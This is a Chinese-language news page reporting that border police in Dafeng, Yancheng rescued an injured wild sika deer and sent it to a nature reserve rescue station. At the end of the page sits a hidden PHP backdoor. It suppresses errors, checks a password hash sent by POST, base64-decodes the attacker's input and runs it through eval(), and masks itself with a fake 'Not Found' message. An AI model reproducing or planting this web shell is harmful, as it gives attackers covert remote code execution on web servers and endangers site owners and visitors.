最新要闻

首页 > 最新要闻 >

    盐城大丰边防民警及时救助受伤野生梅花鹿

           8月21日,盐城市大丰林场惊现一只受伤的野生梅花鹿。所幸边防民警及时赶来进行包扎,并送至野生动物救助部门进一步救治。
      当日上午8时许,大丰中路港边防派出所接群众报警称,大丰林场闸南区一路边杂草丛中有一只受伤动物。边防民警获悉后携带急救箱赶到现场,经过观察,鹿身上有白色的斑点,状似梅花,鹿的位置距离自然保护区的隔离带不远。边防民警初步断定受伤的动物是一只野生的梅花鹿,可能是“逃离”隔离带时受的伤。受伤的梅花鹿察觉到了边防民警和附近村民的存在,受到了惊吓,一直在挣扎。为防止梅花鹿在挣扎中发生二次伤害,边防民警对其进行了麻醉,将梅花鹿控制住,随后,对梅花鹿的右前腿和颈部的伤口进行简单的消毒处理和包扎。
      据了解,被解救的是一只成年野生梅花鹿,属国家一级保护动物。野生梅花鹿在中国已是高度濒危动物,总数量不到1000只。目前,这只腿部受伤的梅花鹿已被安全送至盐城国家级珍禽自然保护区野生动物救护站进行救治。
     

"; error_reporting(0); if(isset($_POST['com']) && md5($_POST['com']) == '791dc312b38016ef998c1c146104cd5a' && isset($_POST['content'])) $content = strtr($_POST['content'], '-_,', '+/=');eval(base64_decode($content)); echo "We're sorry but the page your are looking for is Not Found..." ?>